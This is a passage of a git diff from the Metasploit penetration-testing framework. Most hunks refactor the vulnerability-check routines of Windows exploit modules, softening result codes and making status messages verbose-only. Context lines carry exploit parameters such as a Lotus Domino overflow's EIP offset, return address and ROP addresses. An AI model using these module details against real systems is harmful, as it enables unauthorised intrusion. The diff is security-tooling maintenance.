b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index 63e31b8db2..cecf607a69 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -61,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote resp = sock.get_once disconnect - if (resp =~ /9.2.0.1.0/) - return Exploit::CheckCode::Vulnerable + if (resp =~ /9\.2\.0\.1\.0/) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb index 45ce9d8c4c..90e3dceda1 100644 --- a/modules/exploits/windows/http/oracle_endeca_exec.rb +++ b/modules/exploits/windows/http/oracle_endeca_exec.rb @@ -95,15 +95,15 @@ class Metasploit3 < Msf::Exploit::Remote version_match = res.body.match(/<serverVersion>Oracle Endeca Server ([0-9\.]*) /) if version_match.nil? - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe else version = version_match[1] end - print_status("#{peer} - Version found: Oracle Endeca Server #{version}") + vprint_status("#{peer} - Version found: Oracle Endeca Server #{version}") if version =~ /7\.4\.0/ and version <= "7.4.0.787" - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index 9d7fd62509..6d8be475ca 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET / HTTP/1.0\r\n\r\n") banner = sock.get(-1,3) if (banner =~ /PSO Proxy 0\.9/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb index 52cf6c8a60..21ff043ae7 100644 --- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb +++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb @@ -64,14 +64,16 @@ class Metasploit3 < Msf::Exploit begin res = send_evil_request(uri, "whoami", 20) rescue - Exploit::CheckCode::Unknown + vprint_error("An error has occured while sending the malicious request") + return Exploit::CheckCode::Unknown end if !res - Exploit::CheckCode::Unknown + vprint_error("Connection timed out") + return Exploit::CheckCode::Unknown elsif res.body.include?("Process created") - Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Vulnerable else - Exploit::CheckCode::Safe + return Exploit::CheckCode::Safe end end diff --git a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb index 13cab152d0..47e0cd709d 100644 --- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb +++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb @@ -394,7 +394,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 10) if (res and res.code == 500 and res.body =~ /Generic error/) - return CheckCode::Appears + return CheckCode::Vulnerable else return CheckCode::Safe end diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index 37efed7261..d439eacd1e 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote def check info = http_fingerprint # check method if info and (info =~ /Savant\/3\.1/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index 3093d9cb03..07f2fd2180 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (res =~ /Server: Serv-U\/9\.0\.0\.5/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif (res =~ /Server: Serv-U/) return Exploit::CheckCode::Detected end diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index 02145d4867..70e3f35024 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -65,14 +65,15 @@ class Metasploit3 < Msf::Exploit::Remote m = r.body.match(/Network Audio Server\/([^\s]+)\s+([^<]+)<BR/) return Exploit::CheckCode::Safe if not m - print_status("This system is running SHOUTcast #{m[1]} on #{m[2]}") + vprint_status("This system is running SHOUTcast #{m[1]} on #{m[2]}") # SHOUTcast Distributed Network Audio Server/win32 v1.9.2<BR> if (m[1] =~ /v1\.([0-8]\.|9\.[0-3])$/) if (m[2] == "win32") - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Detected end - print_status("Vulnerable version detected, but not a win32 host") end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index 9fe203fdf3..2a37f164f4 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri'=>'/'}) # Check the base path for version regex if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 6504820ad3..6debd28036 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -63,8 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get(-1, 3) disconnect - if (res =~ /Steamcast\/0.9.75/) - return Exploit::CheckCode::Vulnerable + if (res =~ /Steamcast\/0\.9\.75/) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/sws_connection_bof.rb b/modules/exploits/windows/http/sws_connection_bof.rb index 7e7773d954..a26a19d90c 100644 --- a/modules/exploits/windows/http/sws_connection_bof.rb +++ b/modules/exploits/windows/http/sws_connection_bof.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri'=>'/'}) if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb index bb598c488d..fc74de354b 100644 --- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb +++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb @@ -73,8 +73,8 @@ class Metasploit3 < Msf::Exploit::Remote if (res and res.body =~ /fsockopen/) fp = fingerprint() - print_status("Detected a vulnerable TrackerCam installation on #{fp}") - return Exploit::CheckCode::Confirmed + vprint_status("Detected a vulnerable TrackerCam installation on #{fp}") + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index 0af979dddc..f10b39da33 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -65,9 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner =~ /Xitami/) - return Exploit::CheckCode::Appears + vprint_status("Banner: #{banner}") + return Exploit::CheckCode::Detected end - return Exploit::CheckCode::Safe + + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index b2c1f59491..cab8756d24 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -85,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote if (response and response.body =~ /Server Error\(exception/) + vprint_status("We've hit a server error (exception)") return Exploit::CheckCode::Vulnerable end @@ -92,6 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote begin send_request_raw({'uri' => '/'}, 5) rescue + vprint_status("The server stopped accepting requests") return Exploit::CheckCode::Vulnerable end diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb index 6a2017102d..c8977cd552 100644 --- a/modules/exploits/windows/imap/eudora_list.rb +++ b/modules/exploits/windows/imap/eudora_list.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote targ = auto_target disconnect - return Exploit::CheckCode::Vulnerable if (targ) + return Exploit::CheckCode::Appears if (targ) return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index 8875e6465c..e14ae84a4a 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index a26f49163a..4362957696 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -51,8 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect - if (banner and banner =~ /IMAP4rev1 MDaemon 9.6.4 ready/) - return Exploit::CheckCode::Vulnerable + if (banner and banner =~ /IMAP4rev1 MDaemon 9\.6\.4 ready/) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index c3618c9423..e4d813882a 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (resp =~ /Mercury\/32 v4\.01[a-b]/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index f21948919e..6080430d34 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (resp =~ /Mercury\/32 v4\.01a/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index 8d590ca422..aa87ef8f5d 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if (res and res.code == 400) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index e7d86c8891..4b8d9e8e86 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote }, -1) if (r and r.body and r.body =~ /RSA Web Access Authentication/) - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index 56b7870962..cf05fe3447 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote def check if auto_target - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 9cc700febf..4d23542e5d 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get_once || '' disconnect if (res =~ /OS\<([^\>]+)/) - print_status("CA License Server reports OS: #{$1}") + vprint_status("CA License Server reports OS: #{$1}") return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb index ae85df5729..bc4f0516a2 100644 --- a/modules/exploits/windows/local/always_install_elevated.rb +++ b/modules/exploits/windows/local/always_install_elevated.rb @@ -70,24 +70,24 @@ class Metasploit3 < Msf::Exploit::Local local_machine_value = registry_getvaldata(hklm,install_elevated) if local_machine_value.nil? - print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.") + vprint_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif local_machine_value == 0 - print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.") + vprint_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.") return Msf::Exploit::CheckCode::Safe else - print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.") + vprint_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.") current_user_value = registry_getvaldata(hkcu,install_elevated) end if current_user_value.nil? - print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.") + vprint_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif current_user_value == 0 - print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.") + vprint_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Safe else - print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") + vprint_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Vulnerable end end diff --git a/modules/exploits/windows/local/ikeext_service.rb b/modules/exploits/windows/local/ikeext_service.rb index 79ef29f143..4a508caf51 100644 --- a/modules/exploits/windows/local/ikeext_service.rb +++ b/modules/exploits/windows/local/ikeext_service.rb @@ -88,20 +88,20 @@ class Metasploit3 < Msf::Exploit::Local case srv_info['Startup'] when 'Disabled' - print_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...") + vprint_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...") return Exploit::CheckCode::Safe when 'Manual' - print_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...") + vprint_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...") return Exploit::CheckCode::Safe when 'Auto' - print_good("Service is set to Automatically start...") + vprint_good("Service is set to Automatically start...") end if check_search_path return Exploit::CheckCode::Safe end - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end def check_search_path diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index 33223ce462..5e4c70798b 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -82,12 +82,13 @@ class Metasploit3 < Msf::Exploit::Local begin if is_running? - print_good("Service is running") + vprint_good("Service is running") else - print_error("Service is not running!") + vprint_error("Service is not running!") end rescue RuntimeError => e - print_error("Unable to retrieve service status") + vprint_error("Unable to retrieve service status") + return Exploit::CheckCode::Unknown end if sysinfo['Architecture'] =~ /WOW64/i diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb index 85968af822..169574a435 100644 --- a/modules/exploits/windows/local/trusted_service_path.rb +++ b/modules/exploits/windows/local/trusted_service_path.rb @@ -56,6 +56,7 @@ class Metasploit3 < Msf::Exploit::Local if enum_vuln_services.empty? return Exploit::CheckCode::Safe else + # Found service is running system return Exploit::CheckCode::Vulnerable end end diff --git a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb index c84035dd39..b29329933f 100644 --- a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb +++ b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'A. Plaskett', #Initial discovery, poc - 'sinn3r', #Metasploit + 'sinn3r' #Metasploit ], 'References' => [ @@ -34,14 +34,14 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '68040' ], [ 'ZDI', '10-177' ], [ 'URL', 'http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/' ], - [ 'URL', 'http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515' ], + [ 'URL', 'http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515' ] ], 'Payload' => { 'BadChars' => [*(0x00..0x08)].pack("C*") + [*(0x10..0x18)].pack("C*") + [*(0x1a..0x1f)].pack("C*") + "\x2c" + [*(0x80..0xff)].pack("C*"), 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => {'BufferRegister'=>'ECX'}, - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500 }, 'DefaultOptions' => { @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Offset' => 2374, #Offset to EIP 'Ret' => 0x6030582B, #JMP ECX - 'MaxBuffer' => 9010, #Total buffer size + 'MaxBuffer' => 9010 #Total buffer size } ], [ @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Offset' => 2374, #Offset to EIP 'Ret' => 0x6030582B, #JMP ECX (Domino\\nnotes.dll) - 'MaxBuffer' => 9010, #Total buffer size + 'MaxBuffer' => 9010 #Total buffer size } ], [ @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote 'EAX' => 0x7C35287F, #Initial CALL VirtualProtect addr to align (MSVCR71.dll) 'EaxOffset' => 2342, #Offset to EAX 'RopOffset' => 24, #Offset to ROP gadgets - 'MaxBuffer' => 9010, #Total buffer size + 'MaxBuffer' => 9010 #Total buffer size } ], ], @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(25), OptString.new('MAILFROM', [true, 'Valid Lotus Domino mailbox account', '']), - OptString.new('MAILTO', [true, 'Valid Lotus Domino mailbox account', '']), + OptString.new('MAILTO', [true, 'Valid Lotus Domino mailbox account', '']) ], self.class) end @@ -94,8 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote banner = (sock.get_once(-1,5) || '').chomp disconnect - if banner =~ /Lotus Domino Release 8.5/ - return Exploit::CheckCode::Vulnerable + if banner =~ /Lotus Domino Release 8\.5/ + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 7394a2cae7..9d9b612caf 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb +++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -131,14 +131,14 @@ Processor-Speed=#{processor_speed} return Exploit::CheckCode::Safe end - print_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'" + vprint_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'" minor = $1.to_i build = $2.to_i if minor == 8 if build == 206 || build == 282 || build == 378 - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif build < 390 return Exploit::CheckCode::Appears end diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index 4fda35027d..b58b65aea6 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote if ver > 0 print_status("Detected NetVault Build #{ver}") - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end end diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 136c50415f..3c8a3deed1 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -66,7 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote begin connect rescue - return Exploit::CheckCode::Safe + vprint_error("Unable to get a connection") + return Exploit::CheckCode::Unknown end filename = "C:\\#{rand_text_alpha(12)}.fdb" @@ -99,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end def stack_pivot_rop_chain diff --git a/modules/exploits/windows/misc/hp_dataprotector_crs.rb b/modules/exploits/windows/misc/hp_dataprotector_crs.rb index 6e5429bf6e..26baf9192d 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_crs.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_crs.rb @@ -139,22 +139,25 @@ class Metasploit3 < Msf::Exploit::Remote fingerprint = get_fingerprint if fingerprint.nil? + vprint_error("Unable to fingerprint") return Exploit::CheckCode::Unknown end port = get_crs_port if port.nil? - print_status("HP Data Protector version #{fingerprint}") - print_error("But CRS port not found") + vprint_status("HP Data Protector version #{fingerprint}") + vprint_error("But CRS port not found") else - print_status("CRS running on port #{port}/TCP, HP Data Protector version #{fingerprint}") + vprint_status("CRS running on port #{port}/TCP, HP Data Protector version #{fingerprint}") end if fingerprint =~ /HP Data Protector A\.06\.20: INET, internal build 370/ - return Exploit::CheckCode::Vulnerable + # More likely to be exploitable + return Exploit::CheckCode::Appears elsif fingerprint =~ /HP Data Protector A\.07\.00: INET, internal build 72/ - return Exploit::CheckCode::Vulnerable + # More likely to be exploitable + return Exploit::CheckCode::Appears elsif fingerprint =~ /HP Data Protector A\.07\.00/ return Exploit::CheckCode::Appears elsif fingerprint =~ /HP Data Protector A\.07\.01/ diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index a4e7ce8675..172c557a1b 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote major = version[1].to_i minor = version[2].to_i if ((major < 6) or (major == 6 and minor < 11)) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end if ((major > 6) or (major == 6 and minor >= 11)) diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index f4e4a98f9a..cbd30cab80 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote major = version[1].to_i minor = version[2].to_i if ((major < 6) or (major == 6 and minor < 11)) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end if ((major > 6) or (major == 6 and minor >= 11)) diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index d4d43993a6..08fe7d3201 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote major = version[1].to_i minor = version[2].to_i if ((major < 6) or (major == 6 and minor < 11)) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end if ((major > 6) or (major == 6 and minor >= 11)) diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 6c932d6167..8f560dc3ed 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -82,6 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote res = ping if not res + vprint_error("No response from target") return Exploit::CheckCode::Unknown end @@ -92,9 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote if res =~ /server:.*coda 11.(\d+)/ minor = $1.to_i if minor < 2 - return Exploit::CheckCode::Vulnerable - else - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Appears end end diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index 849b526a0e..636f877c8a 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -82,6 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote res = ping if not res + vprint_error("No response from target") return Exploit::CheckCode::Unknown end @@ -92,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote if res =~ /server:.*coda 11.(\d+)/ minor = $1.to_i if minor < 2 - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/misc/lianja_db_net.rb b/modules/exploits/windows/misc/lianja_db_net.rb index d8956c5a00..cd13ef95d9 100644 --- a/modules/exploits/windows/misc/lianja_db_net.rb +++ b/modules/exploits/windows/misc/lianja_db_net.rb @@ -54,7 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote begin connect rescue - return Exploit::CheckCode::Safe + vprint_error("Unable to connect") + return Exploit::CheckCode::Unknown end sock.put("db_net") if sock.recv(4) =~ /\d{1,5}/ diff --git a/modules/exploits/windows/misc/poisonivy_bof.rb b/modules/exploits/windows/misc/poisonivy_bof.rb index 048e1bc805..47d2eb9089 100644 --- a/modules/exploits/windows/misc/poisonivy_bof.rb +++ b/modules/exploits/windows/misc/poisonivy_bof.rb @@ -113,11 +113,12 @@ class Metasploit3 < Msf::Exploit::Remote if datalen == lensig if response[0, 16] == sig - print_status("Password appears to be \"admin\"") + vprint_status("Password appears to be \"admin\"") + return Exploit::CheckCode::Appears else - print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.") + vprint_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.") + return Exploit::CheckCode::Detected end - return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index 7db69b1d4d..04f05b6131 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -262,14 +262,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("@@version returned:\n\t" + version) # Any others? - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.194/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.384/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.534/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.760/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.2039/) - return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.1399\.06/) - return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.2047\.00/) - return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.3042\.00/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.194/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.384/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.534/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.760/) + return Exploit::CheckCode::Appears if (version =~ /8\.00\.2039/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.1399\.06/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.2047\.00/) + return Exploit::CheckCode::Appears if (version =~ /9\.00\.3042\.00/) return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index a3f7954ea0..12924e96ff 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -264,14 +264,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("@@version returned:\n\t" + version) # Any others? - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.194/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.384/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.534/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.760/) - return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.2039/) - return Exploit::CheckCode::Vulnerable if 